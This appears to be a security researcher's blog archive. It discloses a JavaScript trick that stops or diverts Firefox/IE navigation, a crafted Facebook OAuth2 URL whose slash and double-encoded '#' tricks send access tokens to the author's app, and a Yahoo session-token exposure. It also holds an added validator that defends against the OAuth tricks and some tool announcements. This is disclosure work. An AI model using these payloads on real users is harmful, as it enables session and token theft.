IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowd

To keep a record of the little things I have done since my last blog post:

1- IE/Firefox – Page Redirection Hijack

Several weeks ago, I reported an interesting PoC via my Twitter account: a web page that stops Firefox and IE from redirecting users to their intended destination, even when they have typed it directly into the address bar: https://twitter.com/irsdl/status/294239415428067329

This issue is still unpatched in the latest versions of these browsers (March 2013). Unfortunately, some advertising companies are already exploiting it as well. I have reported it to Mozilla: https://bugzilla.mozilla.org/show_bug.cgi?id=839470

Example 1: No Redirection Ever: http://0me.me/demo/mozilla/firefox/UnRedirectablePage.html

Here is the JavaScript code that does this:

window.onbeforeunload = function(){
      // Unredirectable page: as the browser starts to leave, queue a navigation
      // back to the current page and then block the main thread with an alert;
      // the queued navigation wins over the one the user asked for.
      setTimeout("window.location=document.location;alert('delay by alert');",0);
}

Example 2: This always redirects you to secproject.com: http://0me.me/demo/mozilla/firefox/RedirectToSecProject.html

Here is the JavaScript code that does this:

window.onbeforeunload = function(){
      // Same trick, but the queued navigation goes to a page of the attacker's choosing
      setTimeout("window.location='http://www.secproject.com';alert('delay by alert');",0);
}

2- Facebook OAuth2 Bypass

Yet another Facebook OAuth2 redirection bypass! I found only one issue, and it was very similar to what Nir Goldshlager (www.nirgoldshlager.com) and Egor Homakov (homakov.blogspot.co.uk) had already reported to Facebook. I highly recommend their blog posts about Facebook OAuth2; they are well worth reading and learning from!

Here is what I found on Facebook:

The following URL could send your session to the attacker's domain, letting him hijack your OAuth token:

https://www.facebook.com/dialog/oauth?client_id=210831918949520&response_type=token&scope=,,,,&redirect_uri=https://apps.facebook.com/candycrush1//////////%23/testrdirsdl/%2523

It used to work in all browsers. However, you needed to find a Facebook app the victim had already authorised in order to exploit this issue.

A short description:

- "/////" in the URL -> a run of slashes that works around an IE-specific problem with Facebook's redirection

- "candycrush1" -> redirects the user to an ordinary user page instead of the Candy Crush game ("https://apps.facebook.com/candy.crush1" takes you to a user page instead of an app!)

- "%23" (an encoded "#") and "%2523" (a double-encoded "#") -> strip the "#" from the final URL so the token is appended directly to the URL, and therefore sent to the server, instead of staying in the fragment

The result of loading that URL was:

http://apps.facebook.com/testrdirsdl/&access_token=BlahBlahBlah&expires_in=5033

in which "testrdirsdl" is my app, which can store the tokens at "http://www.secproject.com/demo/showmyinfo.php" (it does not have logging functionality at the moment!)
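As an added example (this is not code from the original post, nor Facebook's own check), here is the kind of strict redirect_uri validation an OAuth2 authorization server should run before sending a token anywhere. It rejects each of the three tricks described above by refusing anything other than an exact match with the registered URI after decoding. The registered URI "https://apps.facebook.com/candycrush/" is an assumption made for illustration; the attack redirect_uri is the one from the post.

```javascript
// Added example, not from the original post or from Facebook: a strict
// redirect_uri check for an OAuth2 authorization server. The registered URI
// below is assumed for illustration; the attack URL is the one quoted above.

// Decode repeatedly (bounded) so that "%2523" -> "%23" -> "#" is exposed.
// Returns null for malformed escapes, or if the string is still changing
// after maxRounds; a validator should reject both.
function fullyDecode(s, maxRounds = 3) {
  let prev = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(prev);
    } catch (e) {
      return null;
    }
    if (next === prev) return next;
    prev = next;
  }
  return null;
}

// Returns { ok, reason }. The only accepted outcome is an exact match with the
// registered URI after canonicalisation; prefix matching on the app's domain
// or path is what let "candycrush1" pass for the Candy Crush app.
function checkRedirectUri(candidate, registered) {
  let cand, reg;
  try {
    cand = new URL(candidate);
    reg = new URL(registered);
  } catch (e) {
    return { ok: false, reason: 'unparseable URL' };
  }
  if (cand.protocol !== 'https:' || reg.protocol !== 'https:') {
    return { ok: false, reason: 'scheme must be https' };
  }
  if (cand.host !== reg.host) {
    return { ok: false, reason: 'host mismatch' };
  }
  // A fragment is never part of a registered URI; if one is present the
  // client is trying to control where the token fragment lands.
  if (cand.hash !== '') {
    return { ok: false, reason: 'fragment not allowed' };
  }
  const path = fullyDecode(cand.pathname);
  if (path === null) {
    return { ok: false, reason: 'malformed or over-encoded path' };
  }
  // An encoded '#' or '?' in the path re-splits the URL once the server
  // appends the token and moves the token out of the fragment (the %23/%2523
  // trick above).
  if (/[#?]/.test(path)) {
    return { ok: false, reason: 'encoded delimiter in path' };
  }
  // Runs of slashes ("//////") are a normalisation trick; reject them outright.
  if (/\/{2,}/.test(cand.pathname)) {
    return { ok: false, reason: 'repeated slashes in path' };
  }
  if (path !== reg.pathname || cand.search !== reg.search) {
    return { ok: false, reason: 'path/query does not exactly match registered URI' };
  }
  return { ok: true, reason: 'exact match' };
}

// Constructed inputs: REGISTERED is an assumed registration for the app;
// ATTACK is the redirect_uri from the URL in the post.
const REGISTERED = 'https://apps.facebook.com/candycrush/';
const ATTACK = 'https://apps.facebook.com/candycrush1//////////%23/testrdirsdl/%2523';

console.log(checkRedirectUri(ATTACK, REGISTERED));
```

The check deliberately fails closed with a reason string rather than a bare boolean, so that rejected authorization requests can be logged and the specific trick (encoded delimiter, slash run, prefix match) shows up in the log.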

3- BugCrowd!

I took part in several BugCrowd.com bounties and gladly received $$$ for both private and public ones! I liked the charity ones as well :-)

If you want to test a variety of live websites without legal worries (well, I hope they can provide us with a signed document per project very soon!), it is the right place. I recommend it to people who want to have fun and improve their web application security testing skills.

Unfortunately, the recent BugCrowd bounties did not offer fair prizes, and I guess that is because of the companies' budgets. Moreover, we still need them to come up with a hall of fame table! As soon as they sort these out, I will become more interested!

That’s it for now. Thanks for your time.

Burp Suite Beautifier Extension

I have updated my project section with a small project “Burp Suite Beautifier Extension”: http://soroush.secproject.com/blog/projects/burp-suite-beautifier/
Please let me know your opinion if you have used it. You can always send me your messages via Twitter “@irsdl”

“Advisories” has been updated

I am quite busy these days and cannot finish my articles or even write about the vulnerabilities in detail. Moreover, I need to update my "Excel Advanced Search" Add-In to be compatible with Office 2010, and I also need to put my "Secure Text Steganography Techniques by using Markov Chain" on this blog in the near future [this project is actually from summer 2008].

However, I have updated the "Advisories" section with my newly reported issues in some Mozilla products, IIS, and Adobe Reader/Acrobat.

I hope I can find more free time soon :-)

Excel Advanced Search Add-In Application

This is a handy Excel Add-In which helps you search and replace inside your Excel files more easily and more powerfully. The best thing about this Add-In is that it is free and open source, so you can simply customise it for your needs.
Unfortunately, the built-in search function of Microsoft Excel is quite weak and cannot handle even simple tasks. Moreover, other useful applications that can search and replace inside Excel files are not free. As a result, I decided to write this tool to have more power when searching in Excel.
As this application is quite new, it is not free of bugs. Please let me know if you find any issue. I will update this section in future if there is a new release.

Features

- Accepts regular expressions
- Supports inclusion or exclusion
- Case-sensitivity option
- Option to select unique results only
- Ability to export the results to an Excel file
- Searches multiple files at the same time
- Detects open workbooks
- Flexible result view
- Search and replace functionality
- Formula Schema option (currently it only has a credit card number checker)
- Logbook that keeps previous keywords
- Can search inside different versions of Excel files

Download

Version: 2.6.1
Date: 14 August 2010
Author: Soroush Dalili
Price: Free and open source!
Download Link: http://soroush.secproject.com/downloadable/excel_search_app.zip
Download Link (Mirror): http://www.0me.me/files/soroush.secproject.com/excel_search_app.zip
URL: http://soroush.secproject.com/blog/projects/exceladvancedsearchapplication/

Screen Shots:

Clicking on an offline message link in Yahoo Messenger can lead to Session Hijacking

Clicking on an offline message link in Yahoo Messenger is the same as clicking on an unknown link in your Yahoo mail! In fact, Yahoo authenticates you before opening the destination link by sending you through this URL:
http://login.yahoo.com/config/reset_cookies_token?.token=[Your Valid Token]&.done=[Destination Link]
Note 1: Fortunately, the destination cannot read your valid token from the Referer header of the HTTP request. However, this valid token is stored in your browser's history, and if you do not sign out of Yahoo, that can be dangerous.
Now you may ask why clicking on a link while you are authenticated to Yahoo is dangerous:
There are a lot of Cross Site Scripting (XSS) vulnerabilities in yahoo.com sub-domains. Some of these XSS attacks are easily detected by IE8 and/or NoScript (a recommended Mozilla Firefox add-on), and some are not. For example, some Asian sub-domains of yahoo.com still have SQL injection, and it is easy to deliver an XSS payload through a simple SQL injection. Moreover, there are some entry points that accept differently encoded input, such as UTF-7 or Base64, which can be used to bypass the client-side protections. There are some other types as well that I do not want to talk about here (I do not want to teach how to find XSS in this post). Some examples: http://www.xssed.com/search?key=yahoo.com

I'm scared. What should I do then?
1- Only open your email in private browsing mode.
2- Do not click on unknown links sent to you via offline messages or your email. If you want to open such a link, open another private browsing window and paste the link there. Alternatively, open those links in a different browser from the one holding your open Yahoo mail session (or from your default browser).
3- Always look at the link's real destination and do not trust its text. For example, a link whose text reads http://www.yahoo.com/ can actually send you to google.com.

I clicked on a link by mistake. What should I do?
1- If you know web security, you can open that link while monitoring your browser through a local proxy such as Fiddler or Burp Suite. You will then see whether it makes any request to yahoo.com or any other domain.
2- If you are not sure what you have done, you MUST change your password immediately. This is the only way to protect yourself. Even shortening the lifetime of your Yahoo session (cookie) cannot solve the problem.

What will happen if I don't care?
1- Attackers will have access to your Yahoo.com account without knowing your password. Fortunately, they cannot change your password directly (but they can still use the forgotten-password section).